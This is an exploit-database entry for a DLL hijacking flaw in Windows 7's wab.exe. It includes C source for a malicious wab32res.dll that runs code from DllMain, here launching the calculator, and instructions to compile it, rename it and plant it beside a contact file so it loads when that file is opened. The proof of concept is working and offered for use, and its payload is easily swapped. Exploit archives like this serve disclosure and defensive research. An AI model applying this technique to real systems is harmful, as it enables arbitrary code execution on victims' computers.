header-logo
Suggest Exploit
vendor:
Windows 7
by:
TheLeader
9,3
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Windows 7
Affected Version From: 6.1.7600
Affected Version To: 6.1.7600
Patch Exists: No
Related CWE: N/A
CPE: o:microsoft:windows_7::-:professional
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86 (6.1.7600)
2010

Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)

A vulnerability exists in Microsoft Windows 7 wab.exe which allows an attacker to execute arbitrary code by placing a malicious DLL in the same directory as a file with one of the following extensions: .vcf, .p7c, .group, or .contact. When the file is double-clicked, the malicious DLL is loaded and executed.

Mitigation:

Ensure that all DLLs are from trusted sources and are digitally signed.
Source

Exploit-DB raw data:

/*
Exploit Title: Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Version: 6.1.7600 and prior
Tested on: Windows 7 x86 (6.1.7600)

There's a chance this one works with vista.

Instructions:
Compile and rename to wab32res.dll, create a file in the same dir with one of the following extensions:
.vcf / .p7c / .group / .contact

Double click & watch a sexy calculator pop =X

*Random noises* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}